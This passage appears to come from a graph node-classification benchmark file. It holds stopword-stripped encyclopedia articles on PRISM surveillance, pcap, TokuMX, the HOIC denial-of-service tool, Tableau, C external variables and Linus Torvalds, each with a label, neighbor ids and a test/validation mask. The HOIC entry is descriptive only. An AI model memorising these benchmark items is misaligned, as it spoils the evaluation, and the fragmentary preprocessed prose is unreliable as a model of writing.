request approved fisa court legal requirement modifying systems make easier government collect data twitter could legally decline provide enhanced mechanism data transmission twitter companies effectively asked construct locked mailbox provide key government people briefed negotiations said facebook instance built system requesting sharing information google provide lockbox system instead transmits required data hand delivery ssh response publicity surrounding media reports data-sharing several companies requested permission reveal public information nature scope information provided response national security requests june 14 2013 facebook reported u.s. government authorized communication numbers aggregate range press release posted web site company reported six months ending december 31 2012 total number user-data requests facebook received government entities u.s. including local state federal including criminal national security-related requests – 9,000 10,000 company reported requests impacted 18,000 19,000 user accounts tiny fraction one percent 1.1 billion active user accounts day microsoft reported period received 6,000 7,000 criminal national security warrants subpoenas orders affecting 31,000 32,000 consumer accounts u.s. governmental entities including local state federal impacted tiny fraction microsoft global customer base google issued statement criticizing requirement data reported aggregated form stating lumping national security requests criminal request data would step backwards previous detailed practices website transparency report company said would continue seek government permission publish number extent fisa requests cisco systems saw huge drop export sales fears national security agency could using backdoors products september 12 2014 yahoo reported u.s. government threatened imposition 250,000 fines per day yahoo n't hand user data part nsa prism program known companies threatened fined providing data response legitimate fisa requests new york times editorial board charged obama administration lost credibility issue lamented years members congress ignored evidence domestic intelligence-gathering grown beyond control even seem disturbed learn every detail public calling texting habits reside n.s.a database wrote respect fisa-court context prism perversion american justice system judicial secrecy coupled one-sided presentation issues according new york times result court whose reach expanding far beyond original mandate without substantive check james robertson former federal district judge based washington served secret foreign intelligence surveillance act court three years 2002 2005 ruled bush administration landmark hamdan v. rumsfeld case said fisa court independent flawed government side represented effectively deliberations anyone judge tell judge needs hear sides case said james robertson without judges benefit adversarial debate suggested creating advocate security clearance would argue government filings robertson questioned whether secret fisa court provide overall legal approval surveillance programs saying court turned something like administrative agency changes brought foreign intelligence surveillance act 1978 amendments act 2008 expanded us government authority forcing court approve entire surveillance systems surveillance warrants previously handled court approving programmatic surveillance n't think judicial function robertson also said frankly stunned new york times report fisa court rulings created new body law broadening ability nsa use surveillance programs target terrorists suspects cases involving espionage cyberattacks weapons mass destruction former cia analyst valerie plame wilson former u.s. diplomat joseph wilson writing op-ed article published guardian said prism nsa data-mining programs might indeed effective hunting capturing actual terrorists n't enough information society make decision electronic frontier foundation eff international non-profit digital-rights group based u.s. hosting tool american resident write government representatives regarding opposition mass spying obama administration argument nsa surveillance programs prism boundless informant necessary prevent acts terrorism challenged several parties ed pilkington nicholas watt guardian said case najibullah zazi planned bomb new york city subway interviews involved parties u.s. british court documents indicated investigation case actually initiated response conventional surveillance methods old-fashioned tip-offs british intelligence services rather leads produced nsa surveillance michael daly daily beast stated even though tamerlan tsarnaev conducted boston marathon bombing brother dzhokhar tsarnaev visited al qaeda-affiliated inspire magazine website even though russian intelligence officials raised concerns u.s. intelligence officials tamerlan tsarnaev prism prevent carrying boston attacks daly observed problem national security agency gathering risk privacy apparently unable monitor risk safety ron paul former republican member congress prominent libertarian thanked snowden greenwald denounced mass surveillance unhelpful damaging urging instead transparency u.s. government actions called congress derelict giving much power government said elected president would ordered searches probable cause crime committed said prism program operated new york times columnist thomas l. friedman defended limited government surveillance programs intended protect american people terrorist acts yes worry potential government abuse privacy program designed prevent another 9/11—abuse far appear happened worry even another 9/11 ... another 9/11 fear 99 percent americans would tell members congress whatever need privacy damned make sure happen fear 'll reluctantly reluctantly trade government using data mining look suspicious patterns phone numbers called e-mail addresses—and go judge get warrant actually look content guidelines set congress—to prevent day fear give government license look anyone e-mail phone call anywhere anytime political commentator david brooks similarly cautioned government data surveillance programs necessary evil n't mass data sweeps well agencies going want go back old-fashioned eavesdropping lot intrusive conservative commentator charles krauthammer worried less legality prism nsa surveillance tools potential abuse without stringent oversight problem constitutionality ... need toughening congressional oversight judicial review perhaps even independent outside scrutiny plus periodic legislative revision—say reauthorization every couple years—in light efficacy safeguards nature external threat object abolish vital programs fix blog post david simon creator wire compared nsa programs including prism 1980s effort city baltimore add dialed number recorders pay phones know individuals called callers city believed drug traffickers using pay phones pagers municipal judge allowed city place recorders placement dialers formed basis show first season simon argued media attention regarding nsa programs faux scandal simon stated many classes people american society already faced constant government surveillance political activist frequent critic u.s. government policies noam chomsky argued governments capacity governments use whatever technology available combat primary enemy – population cnn/opinion research corporation poll conducted june 11 13 found 66 americans generally supported program however quinnipiac university poll conducted june 28 july 8 found 45 registered voters think surveillance programs gone far 40 saying go far enough compared 25 saying gone far 63 saying far enough 2010 polls shown similar shifts public opinion revelations programs leaked terms economic impact study released august information technology innovation foundation found disclosure prism could cost u.s. economy 21.5 35 billion lost cloud computing business three years sentiment around world general displeasure upon learning extent world communication data mining national leaders spoke nsa spoke national surveillance one national minister scathing comments national security agency data-mining program citing benjamin franklin society monitors controls observes citizens less free question costs hunting terrorists overshadows loss citizen privacy nick xenophon australian independent senator asked bob carr australian minister foreign affairs e-mail addresses australian parliamentarians exempt prism mainway marina and/or nucleon carr replied legal framework protect australians government would comment intelligence matters xenophon argued specific answer question taliban spokesperson zabiullah mujahid said knew past efforts trace system used technical resources foil efforts able stop succeeding far however cnn reported terrorist groups changed communications behaviors response leaks 2013 cloud security alliance surveyed cloud computing stakeholders reactions us prism spying scandal 10 non-us residents indicated cancelled project us-based cloud computing provider wake prism 56 said would less likely use us-based cloud computing service alliance predicted us cloud computing providers might lose much €26 billion 20 share cloud services foreign markets prism spying scandal reactions internet users china mixed viewing loss freedom worldwide seeing state surveillance coming secrecy story broke u.s. president barack obama chinese president xi jinping met california asked nsa hacking china spokeswoman ministry foreign affairs people republic china said china strongly advocates cybersecurity party-owned newspaper liberation daily described surveillance like nineteen eighty-four -style hong kong legislators gary fan claudia mo wrote letter obama stating revelations blanket surveillance global communications world leading democracy damaged image u.s. among freedom-loving peoples around world ai weiwei chinese dissident said even though know governments kinds things shocked information us surveillance operation prism abusively using government powers interfere individuals privacy important moment international society reconsider protect individual rights sophie 't veld dutch member european parliament called prism violation eu laws german federal commissioner data protection freedom information peter schaar condemned program monstrous added white house claims reassure given large number german users google facebook apple microsoft services expect german government ... committed clarification limitation surveillance steffen seibert press secretary chancellor office announced angela merkel put issues agenda talks barack obama pending visit berlin wolfgang schmidt former lieutenant colonel stasi said stasi would seen program dream come true since stasi lacked technology made prism possible schmidt expressed opposition saying height naivete think collected information wo n't used nature secret government organizations way protect people privacy allow government collect information first place many germans organized protests including one checkpoint charlie obama went berlin speak matthew schofield mcclatchy washington bureau said germans dismayed obama role allowing collection much information italian president guarantor protection personal data antonello soro said surveillance dragnet would legal italy would contrary principles legislation would represent serious violation cnil french data protection watchdog intimates google change privacy policies within three months 'll risk fines 150,000 euros spanish agency data protection aepd planning fine google 40k 300k euros fails clear past usage massive data spanish users william hague foreign secretary united kingdom dismissed accusations british security agencies circumventing british law using information gathered british citizens prism saying data obtained us united states involving uk nationals subject proper uk statutory controls safeguards david cameron said britain spy agencies received data collected prism acted within law 'm satisfied intelligence agencies fantastically important job country keep us safe operate within law malcolm rifkind chairman parliament intelligence security committee said british intelligence agencies seeking know content emails people living uk actually get lawful authority uk information commissioner office cautious saying would investigate prism alongside european data agencies real issues extent u.s. law agencies access personal data uk european citizens aspects u.s. law companies compelled provide information u.s. agencies potentially conflict european data protection law including uk data protection act ico raised european counterparts issue considered european commission discussions u.s government tim berners-lee inventor world wide web accused western governments practicing hypocrisy conducted spying internet criticized countries spying internet berners-lee stated internet spying make people feel reluctant access intimate details use internet certain way paraphrased steve robson daily mail said internet protected controlled governments large corporations minister external affairs salman khurshid defended prism program saying scrutiny access actual messages computer analysis patterns calls emails sent actually snooping specifically content anybody message conversation information got scrutiny able use prevent serious terrorist attacks several countries comments contradicted foreign ministry characterization violations privacy unacceptable minister communications information technology kapil sibal asked khurshid comments refused comment directly said know nature data information sought part prism even external ministry idea media felt khurshid defence prism india government rolling central monitoring system cms similar prism program khurshid comments criticized indian media well opposition party cpi stated upa government strongly protested surveillance bugging instead shocking khurshid sought justify shameful remark come time even close allies us like germany france protested snooping countries rajya sabha mp p. rajeev told times india act usa clear violation vienna convention diplomatic relations khurshid trying justify speed government india reject asylum application edward snowden shameful june 8 2013 director national intelligence issued fact sheet stating prism undisclosed collection data mining program rather internal government computer system used facilitate collection foreign intelligence information court supervision authorized section 702 foreign intelligence surveillance act fisa 50 u.s.c § 1881a section 702 provides attorney general director national intelligence may authorize jointly period 1 year effective date authorization targeting persons reasonably believed located outside united states acquire foreign intelligence information order authorize targeting attorney general director national intelligence need obtain order foreign intelligence surveillance court fisa court pursuant section 702 certify intelligence important national security united states may lost timely acquired time permit issuance order requesting order attorney general director national intelligence must certify fisa court significant purpose acquisition obtain foreign intelligence information need specify facilities property targeted receiving fisa court order determining emergency circumstances attorney general director national intelligence direct electronic communication service provider give access information facilities carry targeting keep targeting secret provider option 1 comply directive 2 reject 3 challenge fisa court provider complies directive released liability users providing information reimbursed cost providing provider rejects directive attorney general may request order fisa court enforce provider fails comply fisa court order punished contempt court finally provider petition fisa court reject directive case fisa court denies petition orders provider comply directive provider risks contempt court refuses comply fisa court order provider appeal fisa court denial foreign intelligence surveillance court review appeal court review decision supreme court writ certiorari review seal senate select committee intelligence fisa courts put place oversee intelligence operations period death j. edgar hoover beverly gage slate said created new mechanisms supposed stop kinds abuses men like hoover engineered instead looks come function rubber stamps expansive ambitions intelligence community j. edgar hoover longer rules washington turns n't need anyway laura donohue law professor georgetown university law center center national security law called prism nsa mass surveillance programs unconstitutional woodrow hartzog affiliate stanford law school center internet society commented aclu likely demonstrate legitimate first amendment harms chilling effects fourth amendment harms perhaps violation reasonable expectation privacy ... harm merely know certainty monitored government certainly argument people surveillance act differently experience loss autonomy less likely engage self exploration reflection less willing engage core expressive political activities dissenting speech government criticism interests first fourth amendment seek protect fisa amendments act faa section 702 referenced prism documents detailing electronic interception capture analysis metadata many reports letters concern written members congress suggest section faa particular legally constitutionally problematic targeting u.s. persons insofar collections occur u.s. published documents indicate aclu asserted following regarding faa regardless abuses problem faa fundamental statute unconstitutional senator rand paul introducing new legislation called fourth amendment restoration act 2013 stop nsa agencies united states government violating fourth amendment u.s. constitution using technology big data information systems like prism boundless informant besides information collection program started 2007 two programs sharing name prism parallel programs known collectively sigads gather data metadata sources sigad set defined sources targets types data collected legal authorities software associated sigads name umbrella sit blarney sigad summary set slides alongside cartoon insignia shamrock leprechaun hat describes ongoing collection program leverages ic intelligence community commercial partnerships gain access exploit foreign intelligence obtained global networks sigads like prism collect data isp level others take top-level infrastructure type collection known upstream upstream collection includes programs known blanket terms blarney fairview oakstar stormbrew individual sigads data integrated sigad gathered ways besides upstream service providers instance collected passive sensors around embassies even stolen individual computer network hacking attack sigads involve upstream collection instance data could taken directly service provider either agreement case prism means hacking ways according washington post much less known muscular program directly taps unencrypted data inside google yahoo private clouds collects twice many data points compared prism google yahoo clouds span globe tap done outside united states unlike prism muscular program requires fisa type warrants",
    "neighbors": [
      7424,
      6017,
      10631,
      5384,
      1930,
      7178,
      5133,
      4623,
      3088,
      1169,
      9233,
      10002,
      4118,
      8726,
      6136,
      9246,
      8735,
      8356,
      1189,
      11302,
      3495,
      8104,
      10154,
      299,
      9900,
      9517,
      1838,
      8750,
      7857,
      6834,
      10935,
      5308,
      7741,
      1986,
      11078,
      3703,
      6343,
      4937,
      6344,
      10697,
      2636,
      11335,
      7119,
      208,
      7759,
      3154,
      7887,
      8276,
      7893,
      9558,
      10709,
      9688,
      991,
      7137,
      4194,
      2148,
      997,
      3812,
      7527,
      488,
      3305,
      7145,
      107,
      7652,
      8568,
      2162,
      2419,
      4595,
      5749,
      4086,
      119,
      4342,
      6005,
      8564,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 6345,
    "label": 4,
    "text": "Pcap:pcap field computer network administration pcap application programming interface api capturing network traffic name abbreviation technical term art jargon packet capture api proper name unix-like systems implement pcap libpcap library windows port libpcap named winpcap longer supported developed port named npcap windows 7 later still supported monitoring software may use libpcap winpcap npcap capture network packets travelling computer network newer versions transmit packets network link layer get list network interfaces possible use libpcap winpcap npcap pcap api written c languages java .net languages scripting languages generally use wrapper wrappers provided libpcap winpcap c++ programs may link directly c api use object-oriented wrapper libpcap winpcap npcap provide packet-capture filtering engines many open-source commercial network tools including protocol analyzers packet sniffers network monitors network intrusion detection systems traffic-generators network-testers libpcap winpcap npcap also support saving captured packets file reading files containing saved packets applications written using libpcap winpcap npcap able capture network traffic analyze read saved capture analyze using analysis code capture file saved format libpcap winpcap npcap use read applications understand format tcpdump wireshark ca netmaster microsoft network monitor 3.x mime type file format created read libpcap winpcap npcap application/vnd.tcpdump.pcap typical file extension .pcap although .cap .dmp also common use libpcap originally developed tcpdump developers network research group lawrence berkeley laboratory low-level packet capture capture file reading capture file writing code tcpdump extracted made library tcpdump linked developed tcpdump.org group develops tcpdump libpcap originally developed unix-like operating systems successful port windows made called winpcap unmaintained since 2013 several competing forks released new features support newer versions windows winpcap consists programmers politecnico di torino wrote original code 2008 cace technologies company set winpcap developers developed maintained product cace acquired riverbed technology october 21 2010 winpcap uses older ndis 5.x apis work builds windows 10 deprecated removed apis favor newer ndis 6.x apis also forces limitations unable capture 802.1q vlan tags ethernet headers npcap nmap project packet sniffing library windows based winpcap libpcap libraries improved speed portability security efficiency npcap offers win10pcap implementation also based ndis 6 driver model works stably windows 10",
    "neighbors": [
      7426,
      6916,
      7813,
      8582,
      6797,
      2062,
      8976,
      5245,
      5397,
      10005,
      537,
      5657,
      1435,
      1820,
      9245,
      3486,
      6177,
      418,
      3876,
      1580,
      5677,
      7983,
      3250,
      2739,
      692,
      9780,
      823,
      2105,
      9146,
      704,
      8641,
      8770,
      5702,
      842,
      5066,
      7502,
      7889,
      10705,
      9939,
      6997,
      2006,
      87,
      11221,
      8922,
      4957,
      6877,
      10079,
      9440,
      9569,
      4580,
      9320,
      1513,
      2666,
      4074,
      5356,
      8554,
      499,
      2292,
      2804,
      3573,
      8827,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6346,
    "label": 1,
    "text": "TokuMX:tokumx tokumx open-source distribution mongodb among things replaces default b-tree data structure found basic mongodb distribution fractal tree index drop-in replacement mongodb applications run offers scalability performance improvements associated fractal tree indexing also adds support document-level locking transaction support acid mvcc replication optimization support full-text search tokumx specifically designed high performance write-intensive workloads achieves using fractal tree index replaces 40-year-old b-tree indexing based cache-oblivious algorithms approach building memory-efficient systems originally jointly developed researchers massachusetts institute technology rutgers university state university new york stony brook suny tokumx scalable acid mvcc compliant distribution mongodb provides indexing-based query improvements offers online schema modifications reduces slave lag hard disk drives flash memory also adds transactions mvcc acid reliability mongodb application making mongodb suitable much wider range solutions tokumx source files made available terms gnu affero general public license agpl tokukv fractal tree indexing library made available terms gnu general public license gpl version 2 additional grant patent license relational databases use indexes increase query performance databases leverage indexes significantly reduce amount data examine responding queries indexes commonly implemented b-trees data structure first described 1970 b-tree data structure allows operations like inserting data sorted order iteration primary operation used index depending workload implementation b-tree performance limited random i/o characteristics disks addition freshly loaded databases tend good sequential behavior behavior becomes increasingly difficult maintain database grows resulting random i/o performance challenges advent big data ever-increasing database needs 21st century many niche databases created get around limitations 50-year-old b-tree indexing include optimized reads optimized writes series special-purpose databases designed narrow problem set fractal tree indexing technology new approach indexing replaces b-trees fractal tree indexes implement operations b-tree thus drop-in replacement b-trees fractal tree indexes effectively replaces small frequent writes larger less frequent ones enables better compression insertion performance fractal trees also allow messages injected tree fashion schema changes adding dropping column adding index done online background result indexes maintained without drop performance adding data indexes tends stress performance b-trees performs well fractal tree indexes fractal tree index modifications cause database files fragment periodic maintenance compactify files needed fractal tree indexes applied number applications characterized near-real time analysis streaming data used storage layer database storage layer file system used database used setting b-tree used improved performance examples include network event management online advertising networks web 2.0 clickstream analytics air traffic control management uses include accelerated crawler performance search engines social media sites also used create indexes columns online enabling query flexibility ecommerce personalization also suited improving performance reducing existing loads transactional websites general performs well applications must simultaneously store log file data execute ad hoc queries",
    "neighbors": [
      10048,
      9828,
      3512,
      113,
      2901,
      4598,
      2456,
      1049,
      7802,
      7453
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6347,
    "label": 4,
    "text": "High_Orbit_Ion_Cannon:high orbit ion cannon high orbit ion cannon hoic open-source network stress testing denial-of-service attack application designed attack many 256 urls time designed replace low orbit ion cannon developed praetox technologies later released public domain security advisory hoic released prolexic technologies february 2012 hoic developed conclusion operation payback hacktivist collective anonymous operation payback concluded massive pressure group law enforcement agencies captured prosecuted 13 individuals connected group forced many members group rethink strategies subsequently part group launched operation leakspin however large part anonymous remained focused launching opt-in ddos attacks however low orbit ion cannon powerful enough launch attacks limited number users therefore hoic designed remedy ability cause http flood low number user agents 50 users required successfully launch attack co-ordination multiple users leading exponential increase damage hoic first tool kind support so-called booster files configurable vbscript modules randomize http headers attacking computers allowing thousands upon thousands highly randomized combinations user agents apart allowing user agents implement form randomization countermeasures booster files used increase magnitude attack hoic predecessor loic named ion cannon fictional directed-energy weapon described firing beams ions space-based platform onto earth-based targets although ion cannons appear many movies television shows video games science fiction-based setting ones depicted command conquer series video games considered inspiration graphics software gui website simply described hoic program sending http post get requests computer attack uses lulz-inspired graphical interface hoic primarily performs denial-of-service dos attack ddos attack co-ordinated multiple individuals denial-of-service dos attack target url accomplished sending excessive traffic attempt overload site bring basic version attack customized using booster files follow vb 6 mixed vb .net syntax addition hoic simultaneously attack 256 domains making one versatile tools hackers attempting co-ordinate ddos attacks group minimalist gui tool makes user friendly easy control basic routine attack input url website attacked set power option low medium high power option sets request velocity low two requests per second medium four high eight requests per second booster file added uses .hoic extension define dynamic request attributes launch attacks multiple pages within website help evade defense filters attack launched pressing red button gui labelled fire teh lazer basic limitation hoic requires coordinated group users ensure attacks successful even though allowed attacks launched far fewer users older low orbit ion cannon hoic still requires minimum 50 users launch effective attack required sustain target website protection another limiting factor lack anonymizing randomizing capability even though hoic theory offer anonymizing use booster files actual protection provided enough furthermore anonymizing networks tor capable handling bandwidth attacks generated hoic attempt launch attack using tor network actually harm network however anonymous members routinely use proxy servers based sweden launch attacks speculated due notion sweden may stricter internet privacy laws rest world primarily hoic designed stress testing tool lawfully used stress test local networks servers provided person initiating test authorization test long networks servers clients networking equipment urls disrupted hoic also used perform distributed denial-of-service attacks illegal various statutes police justice act 2006 united kingdom amended computer misuse act 1990 specifically outlawed denial-of-service attacks set maximum penalty 10 years prison united states denial-of-service attacks may considered federal crime computer fraud abuse act penalties include ten years imprisonment 2013 criminal charges brought 13 members anonymous participating ddos attack various websites organizations including recording industry association america motion picture association america united states copyright office library congress visa mastercard bank america charged one count conspiracy intentionally cause damage protected computer events occurred september 16 2010 january 2 2011 ddos attacks federal offenses united states prosecuted department justice usc title 18 section 1030 2013 anonymous petitioned united states government via people demanding ddos attacks recognized form virtual protest similar occupy protests ddos mitigation usually works principle distribution basically intelligent routing traffic avoid congestion prevent overload single url methods counter ddos include installation intrusion prevention system ips intrusion detection system ids anonymous first group utilize high orbit ion cannon publicly megaupload file-sharing website shut federal agents raided premises anonymous launched attack website us department justice doj website went offline anonymous claimed success via twitter saying one thing certain expect us megaupload course next hours several websites knocked offline kept offline included websites belonging recording industry association america riaa motion picture association america mpaa bmi finally day drew close website belonging fbi hit repeatedly ultimately succumbed attacks acquired “ tango ” status anonymous claimed single largest internet attack history reported many 27,000 user agents taking part attack",
    "neighbors": [
      2945,
      4488,
      6667,
      2060,
      6797,
      4498,
      4133,
      939,
      1965,
      7983,
      823,
      953,
      4797,
      1088,
      6080,
      2754,
      9282,
      4558,
      847,
      11351,
      7899,
      9181,
      3581,
      2018,
      10852,
      2409,
      5245,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 6348,
    "label": 7,
    "text": "Tableau_Software:tableau software tableau software american interactive data visualization software company founded january 2003 christian chabot pat hanrahan chris stolte mountain view california company currently headquartered seattle washington united states focused business intelligence august 1 2019 salesforce.com acquired tableau chabot hanrahan stolte researchers department computer science stanford university specialized visualization techniques exploring analyzing relational databases data cubes company started commercial outlet research produced stanford 1999-2002 tableau products query relational databases online analytical processing cubes cloud databases spreadsheets generate graph-type data visualizations products also extract store retrieve data in-memory data engine tableau products include tableau mapping functionality able plot latitude longitude coordinates connect spatial files like esri shapefiles kml geojson display custom geography built-in geo-coding allows administrative places country state/province county/district postal codes us congressional districts us cbsa/msa area codes airports european union statistical areas nuts codes mapped automatically group geographies create custom territories use custom geocoding extend existing geographic roles product tableau founded 2003 pat hanrahan christian chabot chris stolte moved headquarters fremont neighborhood seattle washington following year company since expanded fremont headquarters announced plans 2016 auxiliary campus suburban kirkland washington new headquarters building opened near gas works park wallingford march 2017 followed new building fremont opened 2018 august 2016 tableau announced appointment adam selipsky president ceo effective september 16 2016 replacing co-founder christian chabot ceo june 2018 tableau acquired empirical systems cambridge massachusetts based artificial intelligence startup plans integrate company technology tableau platform tableau also announced plans establish office cambridge result deal june 10 2019 tableau acquired salesforce stock deal worth 15 billion may 17 2013 tableau launched initial public offering new york stock exchange raising 250 million prior ipo tableau raised 45 million venture capital investment investors nea meritech company 2013 revenue reached 232.44 million 82 growth 2012 128 million 2010 tableau reported revenue 34.2 million figure grew 62.4 million 2011 127.7 million 2012 profit periods came 2.7 million 3.4 million 1.6 million respectively june 10 2019 salesforce.com announced would acquiring tableau 15.7 billion dollar deal december 2 2010 tableau deleted wikileaks visualizations united states diplomatic cables leak stating due directly political pressure us senator joe lieberman february 21 2011 tableau posted updated data policy accompanying blog post cited two main changes 1 creating formal complaint process 2 using freedom speech guiding principle addition post announced creation advisory board help company navigate future situations push boundaries policy tableau likened new policy model set forth digital millennium copyright act opined new policy wikileaks visuals would removed underlying data statistics cables cables 2008 tableau named codie award winner best business intelligence solution software information industry association company recognized leader gartner magic quadrant seven consecutive years 2012 2019",
    "neighbors": [
      9286,
      5960,
      11016,
      10090,
      83
    ],
    "mask": "Test"
  },
  {
    "node_id": 6349,
    "label": 9,
    "text": "External_variable:external variable c programming language external variable variable defined outside function block hand local automatic variable variable defined inside function block understand external variables relate codice_1 keyword necessary know difference defining declaring variable variable defined compiler allocates memory variable possibly also initializes contents value variable declared compiler requires variable defined elsewhere declaration informs compiler variable name type exists compiler need allocate memory since allocated elsewhere codice_1 keyword means declare without defining words way explicitly declare variable force declaration without definition also possible explicitly define variable i.e force definition done assigning initialization value variable neither codice_1 keyword initialization value present statement either declaration definition compiler analyse modules program decide variable must defined exactly one modules program definition one error produced possibly linking stage variable may declared many times long declarations consistent definition something header files facilitate greatly may declared many modules including module defined even many times module usually pointless declare module external variable may also declared inside function case codice_1 keyword must used otherwise compiler consider definition local automatic variable different scope lifetime initial value declaration visible inside function instead throughout function module codice_1 keyword applied function prototype absolutely nothing codice_1 keyword applied function definition course non-sensical function prototype always declaration never definition also standard c function always external compiler extensions allow function defined inside function external variable accessed functions modules program global variable function able use variable declaration definition external variable must lie function definition source code must declaration variable keyword codice_1 inside function codice_8 keyword codice_8 codice_1 mutually exclusive applied definition external variable changes bit variable accessed functions module defined possible function module pass reference pointer variable another function another module case even though function another module read modify contents variable—it refer name also possible use codice_8 keyword definition local variable without codice_8 keyword variable automatically allocated function called released function exits thus name automatic variable value retained function calls codice_8 keyword variable allocated program starts released program ends value lost function calls variable still local since accessed name inside function defined reference pointer passed another function allowing read modify contents variable without referring name external variables allocated initialized program starts memory released program ends lifetime program initialization done explicitly external static local static variables initialized zero local automatic variables uninitialized i.e contain trash values codice_8 keyword applied function definition changes linkage function visible translation unit definition located prevents function called name outside module remains possible pass function pointer module use invoke function declaring function using codice_8 keyword also good way keep name short avoiding name clashes file 1 file 2 example variable global_variable defined file 1 order utilize variable file 2 must declared regardless number files global variable defined however must declared file outside one containing definition normal methodology allocation actual definitions go .c files mere declarations prototypes allocate describe types parameters compiler work correctly information belongs .h header file others safely include without possible conflict",
    "neighbors": [
      1152,
      5059,
      8524,
      6349,
      10510,
      6640,
      3960,
      2045,
      1343
    ],
    "mask": "Test"
  },
  {
    "node_id": 6350,
    "label": 4,
    "text": "E-commerce_identification_and_identification_types:e-commerce identification identification types whole new range techniques developed identify people since 1960s measurement analysis parts bodies dna profiles forms identification used ensure citizens eligible rights benefits vote without fear impersonation private individuals used seals signatures centuries lay claim real personal estate. “ generally amount proof identity required gain access something proportionate value sought estimated 4 online transactions use methods simple passwords security systems resources generally follows three-step process ” identification authentication authorization today high level trust critical ecommerce transactions traditional face-to-face transactions scheme established maintained whereby users properly consistently effectively efficiently identified systems accessed identity verification service often employed ensure users customers provide information associated identity real person authentication verification identity entity requesting access system process determining whether someone something fact declared private public computer networks including internet authentication commonly done use logon passwords knowledge password assumed guarantee user authentic user registers initially registered someone else using assigned self-declared password subsequent use user must know use previously declared password weakness system transactions significant exchange money passwords often stolen accidentally revealed forgotten reason internet business many transactions require stringent authentication process use digital certificates issued verified certificate authority ca part public key infrastructure considered likely become standard way perform authentication internet logically authentication precedes authorization although may often seem combined authorization process giving someone permission something multi-user computer systems system administrator defines system users allowed access system privileges use access file directories hours access amount allocated storage space forth assuming someone logged computer operating system application system application may want identify resources user given session thus authorization sometimes seen preliminary setting permissions system administrator actual checking permission values set user getting access logically authorization preceded authentication",
    "neighbors": [
      7368,
      11244,
      2737,
      9745,
      5433,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 6351,
    "label": 7,
    "text": "Marabunta_(software):marabunta software marabunta fully distributed software application anonymous p2p main goal fight internet censorship assuring freedom speech peer-to-peer platform information exchange among nodes anonymous way based several communication algorithms called order chaos found massive social organizations ant colonies project founded university zaragoza spain developed promoted students computing engineering although development teams users many different places shown interest perhaps attracted ideological aims project software available spanish english website also available english marabunta uses qt graphical widget toolkit allowing used linux microsoft windows released gnu general public license marabunta free software marabunta implementation ideas explained free nets project developed ideas mind many potential services run top marabunta text message interchange first service could taken platform telegram distribution computer net works host server four message distribution lists receivers receive messages sent list interested general technology philosophy politics content filters allowed messages certain patterns displayed specially useful searching specific information marabunta selects potentially interesting messages generated traffic uses udp/ip protocols avoiding setting connections nodes lets traffic flow network operational redundancy every node used moreover udp protocol could seen increasing anonymity net need validate source hosts receive datagram marabunta support udp hole punching users behind nats establish port forwarding route let router know port node internal net forward arriving datagrams",
    "neighbors": [
      4229,
      4490,
      1164,
      6797,
      11029,
      11413,
      10522,
      3366,
      7983,
      823,
      3770,
      8640,
      3792,
      3676,
      5085,
      5472,
      3428,
      3813,
      7921,
      5749
    ],
    "mask": "Test"
  },
  {
    "node_id": 6352,
    "label": 2,
    "text": "Linus_Torvalds:linus torvalds linus benedict torvalds born december 28 1969 finnish-american software engineer creator historically principal developer linux kernel kernel linux operating systems distributions operating systems android chrome os also created distributed version control system git scuba dive logging planning software subsurface honored along shinya yamanaka 2012 millennium technology prize technology academy finland recognition creation new open source operating system computers leading widely used linux kernel also recipient 2014 ieee computer society computer pioneer award 2018 ieee masaru ibuka consumer electronics award torvalds born helsinki finland 1969 son journalists anna nils torvalds grandson statistician leo törnqvist poet ole torvalds parents campus radicals university helsinki 1960s family belongs swedish-speaking minority torvalds named linus pauling nobel prize-winning american chemist although book rebel code linux open source revolution torvalds quoted saying think named equally linus peanuts cartoon character noting makes half nobel prize-winning chemist half blanket-carrying cartoon character torvalds attended university helsinki 1988 1996 graduating master degree computer science nodes research group academic career interrupted first year study joined finnish army uusimaa brigade summer 1989 selecting 11-month officer training program fulfill mandatory military service finland army held rank second lieutenant role ballistic calculation officer torvalds bought computer science professor andrew tanenbaum book tanenbaum describes minix educational stripped-down version unix 1990 resumed university studies exposed unix first time form dec microvax running ultrix m.sc thesis titled linux portable operating system interest computers began commodore vic-20 age 11 1981 initially programming basic later directly accessing 6502 cpu machine code make use assembly language vic-20 purchased sinclair ql modified extensively especially operating system hard get software finland linus wrote assembler editor addition pac-man graphics libraries ql well games wrote pac-man clone named cool man january 5 1991 purchased intel 80386-based clone ibm pc receiving minix copy turn enabled begin work linux first prototypes linux publicly released later year 1991 version 1.0 released march 14 1994 torvalds first encountered gnu project 1991 another swedish-speaking computer science student lars wirzenius took university technology listen free software guru richard stallman speech torvalds used stallman gnu general public license version 2 gplv2 linux kernel visit transmeta late 1996 torvalds accepted position company california would work february 1997 june 2003 moved open source development labs since merged free standards group become linux foundation whose auspices continues work june 2004 torvalds family moved dunthorpe oregon closer osdl beaverton oregon-based headquarters 1997 1999 involved 86open helping choose standard binary format linux unix 1999 named mit technology review tr100 one world top 100 innovators age 35 1999 red hat va linux leading developers linux-based software presented torvalds stock options gratitude creation year companies went public torvalds share value temporarily shot roughly us 20 million personal mascot penguin nicknamed tux widely adopted linux community mascot linux kernel although torvalds believes open source right way software also said uses best tool job even includes proprietary software criticized use alleged advocacy proprietary bitkeeper software version control linux kernel torvalds subsequently wrote free-software replacement bitkeeper called git 2008 torvalds stated used fedora distribution linux fairly good support powerpc processor architecture favored time usage fedora confirmed later 2012 interview also posted updates choice desktop environment often response perceived feature regressions currently linux foundation sponsors torvalds work full-time improving linux linus torvalds known disagreeing developers linux kernel mailing list calling really unpleasant person later explained 'd like nice person curse less encourage people grow rather telling idiots 'm sorry – tried attitude torvalds considers necessary making point clear drawn criticism intel programmer sage sharp systemd developer lennart poettering among others sunday september 16 2018 linux kernel code conflict suddenly replaced new code conduct based contributor covenant shortly thereafter release notes linux 4.19-rc4 linus apologized behavior calling personal attacks past unprofessional uncalled announced period time get assistance understand people ’ emotions respond appropriately soon transpired events followed new yorker approaching linus series questions critical conduct following release linux 4.19 october 22 linus went back maintaining kernel initially torvalds wanted call kernel developed freax combination free freak letter x indicate unix-like system friend ari lemmke administered ftp server kernel first hosted download named torvalds directory linux 2006 approximately two percent linux kernel written torvalds thousands contributed linux kernel percentage one largest contributions however stated 2012 personal contribution mostly merging code written others little programming torvalds retains highest authority decide new code incorporated standard linux kernel torvalds holds linux trademark monitors use chiefly linux mark institute linus torvalds married tove torvalds née monni —a six-time finnish national karate champion—whom first met late 1993 linus 